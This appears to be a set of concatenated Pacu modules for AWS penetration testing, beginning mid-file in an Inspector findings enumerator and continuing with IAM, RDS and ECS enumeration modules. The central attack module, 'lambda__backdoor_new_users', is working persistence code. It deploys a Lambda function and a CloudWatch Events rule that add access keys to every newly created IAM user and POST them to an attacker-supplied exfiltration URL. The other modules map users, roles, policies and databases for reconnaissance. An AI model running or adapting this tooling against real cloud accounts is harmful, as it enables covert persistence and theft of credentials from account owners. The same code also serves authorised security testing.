                    with urllib.request.urlopen(response['url']) as response, save(p, 'a') as f:
                        f.write(str(response.read()))
                else:
                    print('Failed to generate report for {} ({})...'.format(run, response['status']))
        findings = []
        try:
            response = client.list_findings()
            findings = response['findingArns']
            while 'nextToken' in response:
                response = client.list_findings(nextToken=response['nextToken'])
                findings += response['findingArns']
        except ClientError as error:
            if error.response['Error']['Code'] == 'AccessDeniedException':
                print('Access Denied for list-findings')
                continue
        try:
            if len(findings) < 1:
                print('  No findings found')
                continue
            else:
                print('  {} findings found'.format(len(findings)))
                summary_data['findings'] += len(findings)
            descriptions = client.describe_findings(findingArns=findings)['findings']
            complete_data[region] = descriptions
        except ClientError as error:
            if error.response['Error']['Code'] == 'AccessDeniedException':
                print('Access Denied for describe-findings')
    session.update(pacu_main.database, Inspector=complete_data)
    return summary_data


def summary(data, pacu_main):
    out = '  Regions Enumerated:\n'
    for region in data['regions']:
        out += '    {}\n'.format(region)
    if 'reports_location' in data:
        out += '  Reports saved to: {}\n'.format(data['reports_location'])
    out += '  {} reports found.\n'.format(data['reports'])
    out += '  {} findings found.\n'.format(data['findings'])
    return out



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
from copy import deepcopy


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'iam__enum_users_roles_policies_groups',

    # Name and any other notes about the author
    'author': 'Spencer Gietzen of Rhino Security Labs',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'ENUM',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Enumerates users, roles, customer-managed policies, and groups.',

    # Description about what the module does and how it works
    'description': 'This module requests the info for all users, roles, customer-managed policies, and groups in the account. If no arguments are supplied, it will enumerate all four, if any are supplied, it will enumerate those only.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['IAM'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--users', '--roles', '--policies', '--groups'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--users', required=False, action='store_true', help='Enumerate info for users in the account')
parser.add_argument('--roles', required=False, action='store_true', help='Enumerate info for roles in the account')
parser.add_argument('--policies', required=False, action='store_true', help='Enumerate info for policies in the account')
parser.add_argument('--groups', required=False, action='store_true', help='Enumerate info for groups in the account')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    ######
    summary_data = {}
    client = pacu_main.get_boto3_client('iam')

    if args.users is False and args.roles is False and args.policies is False and args.groups is False:
        args.users = args.roles = args.policies = args.groups = True

    if args.users is True:
        users = []
        response = None
        is_truncated = False

        try:
            while response is None or is_truncated is True:
                if is_truncated is False:
                    response = client.list_users()

                else:
                    response = client.list_users(
                        Marker=response['Marker']
                    )

                for user in response['Users']:
                    users.append(user)

                is_truncated = response['IsTruncated']

            print('Found {} users'.format(len(users)))
        except ClientError:
            print('No Users Found')
            print('  FAILURE: MISSING NEEDED PERMISSIONS')

        iam_data = deepcopy(session.IAM)
        iam_data['Users'] = users
        session.update(pacu_main.database, IAM=iam_data)
        summary_data['Users'] = len(users)

    if args.roles is True:
        roles = []
        response = None
        is_truncated = False

        try:
            while response is None or is_truncated is True:
                if is_truncated is False:
                    response = client.list_roles()

                else:
                    response = client.list_roles(
                        Marker=response['Marker']
                    )

                for role in response['Roles']:
                    roles.append(role)

                is_truncated = response['IsTruncated']
            print('Found {} roles'.format(len(roles)))

        except ClientError:
            print('No Roles Found')
            print('  FAILURE: MISSING NEEDED PERMISSIONS')

        iam_data = deepcopy(session.IAM)
        iam_data['Roles'] = roles
        session.update(pacu_main.database, IAM=iam_data)
        summary_data['Roles'] = len(roles)

    if args.policies is True:
        policies = []
        response = None
        is_truncated = False

        try:
            while response is None or is_truncated is True:
                if is_truncated is False:
                    response = client.list_policies(
                        Scope='Local'
                    )

                else:
                    response = client.list_policies(
                        Scope='Local',
                        Marker=response['Marker']
                    )

                for policy in response['Policies']:
                    policies.append(policy)

                is_truncated = response['IsTruncated']
            print('Found {} policies'.format(len(policies)))

        except ClientError:
            print('No Policies Found')
            print('  FAILURE: MISSING NEEDED PERMISSIONS')

        iam_data = deepcopy(session.IAM)
        iam_data['Policies'] = policies
        session.update(pacu_main.database, IAM=iam_data)
        summary_data['Policies'] = len(policies)

    if args.groups is True:
        groups = []
        response = None
        is_truncated = False

        try:
            while response is None or is_truncated is True:

                if is_truncated is False:
                    response = client.list_groups()

                else:
                    response = client.list_groups(
                        Marker=response['Marker']
                    )

                for group in response['Groups']:
                    groups.append(group)

                is_truncated = response['IsTruncated']
            print('Found {} groups'.format(len(groups)))

        except ClientError:
            print('No Groups Found')
            print('  FAILURE: MISSING NEEDED PERMISSIONS')

        iam_data = deepcopy(session.IAM)
        iam_data['Groups'] = groups
        session.update(pacu_main.database, IAM=iam_data)
        summary_data['Groups'] = len(groups)

    return summary_data


def summary(data, pacu_main):
    out = ''
    for key in data:
        out += '  {} {} Enumerated\n'.format(data[key], key)
    out += '  IAM resources saved in Pacu database.\n'
    return out



#!/usr/bin/env python3
import argparse
from copy import deepcopy

from botocore.exceptions import ClientError


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'rds_enum',

    # Name and any other notes about the author
    'author': 'Julio Melo of appminer.io and eufuihackeado.com.br',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'ENUM',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Enumerates RDS instances',

    # Full description about what the module does and how it works
    'description': 'This module enumerates all relevant instances databases from AWS RDS of a given region, including databases master username, SGDB (engine), port and endpoints',

    # A list of AWS services that the module utilizes during its execution
    'services': ['RDS'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': [
        '--regions'
    ],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format us-east-1. Defaults to all session regions.')

def fetch_db_instances(client, func, key, print, **kwargs):
    caller = getattr(client, func)
    try:
        response = caller(**kwargs)
        data = response[key]
        while 'NextToken' in response and response['NextToken'] != '':
            print({**kwargs, **{'NextToken': response['NextToken']}})
            response = caller({**kwargs, **{'NextToken': response['NextToken']}})
            data.extend(response[key])
        for resource in data:
            resource['region'] = client.meta.region_name
        return data
    except ClientError as error:
        code = error.response['Error']['Code']
        if code == 'AccessDeniedException':
            print('  {} FAILURE: MISSING NEEDED PERMISSIONS'.format(func))
        else:
            print(code)
    return []


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    ######

    if args.regions is None:
        regions = get_regions('rds')
        if regions is None or regions == [] or regions == '' or regions == {}:
            print('This module is not supported in any regions specified in the current sessions region set. Exiting...')
            return
    else:
        regions = args.regions.split(',')

    all_databases = []
    for region in regions:
        print('Starting region {}...'.format(region))
        client = pacu_main.get_boto3_client('rds', region)

        # Database instances
        databases_instances = fetch_db_instances(client, 'describe_db_instances', 'DBInstances', print)
        print('  {} database(s) found.'.format(len(databases_instances)))
        all_databases += databases_instances


    summary_data = {
        'databases': len(all_databases),
    }

    for var in vars(args):
        if var == 'regions':
            continue
        if not getattr(args, var):
            del summary_data[var]

    rds_data = deepcopy(session.RDS)

    rds_data['Databases'] = all_databases
    session.update(pacu_main.database, RDS=rds_data)

    return summary_data


def summary(data, pacu_main):
    out = ''
    for key in data:
        out += '  {} total {}(s) found.\n'.format(data[key], key[:-1])
    out += '\n  RDS resources saved in Pacu database.\n'
    return out



#!/usr/bin/env python3
import argparse
from pathlib import Path

import re
from botocore.exceptions import ClientError
from copy import deepcopy
import random
import string
import zipfile
import os

from pacu.core.lib import module_data_dir
from pacu.utils import zip_file

module_info = {
    'name': 'lambda__backdoor_new_users',

    'author': 'Spencer Gietzen of Rhino Security Labs based on code from Daniel Grzelak (https://github.com/dagrz/aws_pwn/blob/master/persistence/backdoor_created_users_lambda/backdoor_created_users_lambda.py)',

    'category': 'PERSIST',

    'one_liner': 'Creates a Lambda function and CloudWatch Events rule to backdoor new IAM users.',

    'description': 'This module creates a new Lambda function and an accompanying CloudWatch Events rule that will trigger upon a new IAM user being created in the account. The function will automatically add a set of access keys to the user and send them to the server you supplied. The function and rule will always be created in us-east-1, as that is the only CloudWatch region that gets sent IAM events. Warning: Your backdoor will not execute if the account does not have an active CloudTrail trail in us-east-1.',

    'services': ['Lambda', 'Events', 'IAM'],

    'prerequisite_modules': ['iam__enum_users_roles_policies_groups'],

    'external_dependencies': [],

    'arguments_to_autocomplete': ['--exfil-url','--role-arn', '--cleanup'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--exfil-url', required=False, default=None,
                    help='The URL to POST backdoor credentials to, so you can access them.')
parser.add_argument('--role-arn', required=False, default=None,
                    help='The role should allow Lambda to assume it and have at least the IAM CreateAccessKey permission.')
parser.add_argument('--cleanup', required=False, default=False, action='store_true',
                    help='Run the module in cleanup mode. This will remove any known backdoors that the module added '
                         'from the account.')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ######
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    fetch_data = pacu_main.fetch_data


    MODULE_PATH = Path(__file__).parent
    MODULE_SESSION_PATH = module_data_dir(module_info['name'])
    CREATED_LAMBDA_FUNCTIONS_PATH = MODULE_SESSION_PATH/'created-lambda-functions.txt'
    CREATED_CLOUDWATCH_EVENTS_RULES_PATH = MODULE_SESSION_PATH/'created-cloudwatch-events-rules.txt'
    LAMBDA_FUNCTION_ZIP_PATH = MODULE_SESSION_PATH/'lambda_function.zip'
    ######

    if args.cleanup:
        created_lambda_functions = []
        created_cwe_rules = []

        if CREATED_LAMBDA_FUNCTIONS_PATH.is_file():
            with open(CREATED_LAMBDA_FUNCTIONS_PATH, 'r') as f:
                created_lambda_functions = f.readlines()
        if CREATED_CLOUDWATCH_EVENTS_RULES_PATH.is_file():
            with open(CREATED_CLOUDWATCH_EVENTS_RULES_PATH, 'r') as f:
                created_cwe_rules = f.readlines()

        if created_lambda_functions:
            delete_function_file = True
            for function in created_lambda_functions:
                name = function.rstrip()
                print('  Deleting function {}...'.format(name))
                client = pacu_main.get_boto3_client('lambda', 'us-east-1')
                try:
                    client.delete_function(
                        FunctionName=name
                    )
                except ClientError as error:
                    code = error.response['Error']['Code']
                    if code == 'AccessDeniedException':
                        print('  FAILURE: MISSING NEEDED PERMISSIONS')
                    else:
                        print(code)
                    delete_function_file = False
                    break
            if delete_function_file:
                try:
                    os.remove(CREATED_LAMBDA_FUNCTIONS_PATH)
                except Exception as error:
                    print(f"  Failed to remove {CREATED_LAMBDA_FUNCTIONS_PATH}")
                    print('    {}: {}'.format(type(error), error))

        if created_cwe_rules:
            delete_cwe_file = True
            for rule in created_cwe_rules:
                name = rule.rstrip()
                print(f'  Deleting rule {name}...')
                client = pacu_main.get_boto3_client('events', 'us-east-1')
                try:
                    client.remove_targets(
                        Rule=name,
                        Ids=['0']
                    )
                    client.delete_rule(
                        Name=name
                    )
                except ClientError as error:
                    code = error.response['Error']['Code']
                    if code == 'AccessDeniedException':
                        print('  FAILURE: MISSING NEEDED PERMISSIONS')
                    else:
                        print(code)
                    delete_cwe_file = False
                    break
            if delete_cwe_file:
                try:
                    os.remove(CREATED_CLOUDWATCH_EVENTS_RULES_PATH)
                except Exception as error:
                    print(f"  Failed to remove {CREATED_LAMBDA_FUNCTIONS_PATH}")
                    print('    {}: {}'.format(type(error), error))

        print('Completed cleanup mode.\n')
        return {'cleanup': True}

    if not args.exfil_url:
        print('  --exfil-url is required if you are not running in cleanup mode!')
        return

    data = {'functions_created': 0, 'rules_created': 0, 'successes': 0}

    created_resources = {'LambdaFunctions': [], 'CWERules': []}

    if not args.role_arn:
        while True:
            target_role_arn = input('  What role should be used? Note: The role should allow Lambda to assume it and have '
                                    'at least the IAM CreateAccessKey permission. Enter the ARN now or just press enter to '
                                    'enumerate a list of possible roles to choose from: ')
            if not re.match(r'arn:(aws[a-zA-Z-]*)?:iam::\d{12}:role/?[a-zA-Z_0-9+=,.@\-_/]+', target_role_arn):
                print('\n[ERROR] ARN format must be: arn:(aws[a-zA-Z-]*)?:iam::\\d{12}:role/?[a-zA-Z_0-9+=,.@\\-_/]+\n')
            else:
                break
    else:
        target_role_arn=args.role_arn


    if not target_role_arn:
        if fetch_data(['IAM', 'Roles'], module_info['prerequisite_modules'][0], '--roles', force=True) is False:
            print('Pre-req module not run successfully. Exiting...')
            return None
        roles = deepcopy(session.IAM['Roles'])

        print('Found {} roles. Choose one below.'.format(len(roles)))
        for i in range(0, len(roles)):
            print('  [{}] {}'.format(i, roles[i]['RoleName']))
        choice = input('Choose an option: ')
        target_role_arn = roles[int(choice)]['Arn']

    # Import the Lambda function and modify the variables it needs
    with open(MODULE_PATH/'lambda_function.py.bak', 'r') as f:
        source_code = f.read()

    source_code = source_code.replace('POST_URL', args.exfil_url)

    # Zip the Lambda function
    try:
        print('  Zipping the Lambda function...\n')
        zip_data = {'lambda_function.py': source_code}
        zip_file_bytes = zip_file(LAMBDA_FUNCTION_ZIP_PATH, zip_data)
    except Exception as error:
        print('Failed to zip the Lambda function locally: {}\n'.format(error))
        return data

    client = pacu_main.get_boto3_client('lambda', 'us-east-1')

    try:
        function_name = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(15))
        response = client.create_function(
            FunctionName=function_name,
            Runtime='python3.9',
            Role=target_role_arn,
            Handler='lambda_function.lambda_handler',
            Code={
                'ZipFile': zip_file_bytes
            }
        )
        lambda_arn = response['FunctionArn']
        print('  Created Lambda function: {}'.format(function_name))
        data['functions_created'] += 1
        created_resources['LambdaFunctions'].append(function_name)

        client = pacu_main.get_boto3_client('events', 'us-east-1')

        response = client.put_rule(
            Name=function_name,
            EventPattern='{"source":["aws.iam"],"detail-type":["AWS API Call via CloudTrail"],"detail":{"eventSource":["iam.amazonaws.com"],"eventName":["CreateUser"]}}',
            State='ENABLED'
        )
        print('  Created CloudWatch Events rule: {}'.format(response['RuleArn']))
        data['rules_created'] += 1

        client = pacu_main.get_boto3_client('lambda', 'us-east-1')

        client.add_permission(
            FunctionName=function_name,
            StatementId=''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10)),
            Action='lambda:InvokeFunction',
            Principal='events.amazonaws.com',
            SourceArn=response['RuleArn']
        )

        client = pacu_main.get_boto3_client('events', 'us-east-1')

        response = client.put_targets(
            Rule=function_name,
            Targets=[
                {
                    'Id': '0',
                    'Arn': lambda_arn
                }
            ]
        )
        if response['FailedEntryCount'] > 0:
            print('Failed to add the Lambda function as a target to the CloudWatch rule. Failed entries:')
            print(response['FailedEntries'])
        else:
            print('  Added Lambda target to CloudWatch Events rule.')
            data['successes'] += 1
            created_resources['CWERules'].append(function_name)
    except ClientError as error:
        code = error.response['Error']['Code']
        if code == 'AccessDeniedException':
            print('  FAILURE: MISSING NEEDED PERMISSIONS')
        else:
            print(error.response['Error']['Message'])
            return data

    if created_resources['LambdaFunctions']:
        with open(CREATED_LAMBDA_FUNCTIONS_PATH, 'w+') as f:
            f.write('\n'.join(created_resources['LambdaFunctions']))
    if created_resources['CWERules']:
        with open(CREATED_CLOUDWATCH_EVENTS_RULES_PATH, 'w+') as f:
            f.write('\n'.join(created_resources['CWERules']))

    print(
        'Warning: Your backdoor will not execute if the account does not have an active CloudTrail trail in us-east-1.')

    return data


def summary(data, pacu_main):
    if data.get('cleanup'):
        return '  Completed cleanup of Lambda functions and CloudWatch Events rules.'

    return '  Lambda functions created: {}\n  CloudWatch Events rules created: {}\n  Successful backdoor deployments: {}\n'.format(
        data['functions_created'], data['rules_created'], data['successes'])



#!/usr/bin/env python3
from botocore.exceptions import ClientError

import argparse
import os
import json

from pacu.core.lib import strip_lines, save, session_dir
from pacu import Main

module_info = {
    'name': 'ecs__enum_task_def',
    'author': 'Nicholas Spagnola of Rhino Security Labs',
    'category': 'ENUM',
    'one_liner': 'Parses task definitions from ECS tasks',
    'description': 'This module will pull task definitions for ECS clusters.',
    'services': ['ECS'],
    'prerequisite_modules': ['ecs__enum'],
    'arguments_to_autocomplete': ['--task_definitions'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument('--task_definitions', required=False, default=None, help=strip_lines('''
    A comma separated list of ECS task defintion ARNs 
    (arn:aws:ecs:us-east-1:273486424706:task-definition/first-run-task-definition:latest)
'''))


def main(args, pacu_main: 'Main'):
    session = session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print

    fetch_data = pacu_main.fetch_data
    ######

    task_definitions = []
    summary_data = {"task_definitions": 0}

    if args.task_definitions is not None:
        for task_def in args.task_definitions.split(','):
            task_definitions.append({
                'Task Defintion ID': task_def
            })
    else:
        if fetch_data(['ECS', 'TaskDefinitions'], module_info['prerequisite_modules'][0], '--taskdef') is False:
            print('Pre-req module not run successfully. Exiting...')
            return None
        task_definitions = session.ECS['TaskDefinitions']

    if task_definitions:
        print("Targeting {} task definition(s)...".format(len(task_definitions)))

        for task_def in task_definitions:
            region = task_def.split(':')[3]
            client = pacu_main.get_boto3_client('ecs', region)

            try:
                task_def_data = client.describe_task_definition(
                    taskDefinition=task_def,
                )
            except ClientError as error:
                code = error.response['Error']['Code']
                print('FAILURE: ')
                if code == 'AccessDenied':
                    print('  Access denied to DescribeTaskDefinition.')
                    print('Skipping the rest of the task definitions...')
                    break
                else:
                    print('  ' + code)

            formatted_data = "{}@{}\n{}\n\n".format(
                task_def,
                region,
                json.dumps(task_def_data['taskDefinition'], indent=4, default=str)
            )

            with save('ecs_task_def_data/all_task_def.txt'.format(session.name), 'a+') as f:
                f.write(formatted_data)
            with save('ecs_task_def_data/{}.txt'.format(session.name, task_def.split('/')[1].split(':')[0])) as f:
                f.write(formatted_data.replace('\\t', '\t').replace('\\n', '\n').rstrip())
            summary_data['task_definitions'] += 1

    return summary_data


def summary(data, pacu_main):
    return (
        '  ECS Task Definition Data for {} task definition(s) was written to {}'
        '/downloads/ecs_task_def_data/'
    ).format(data['task_definitions'], session_dir())
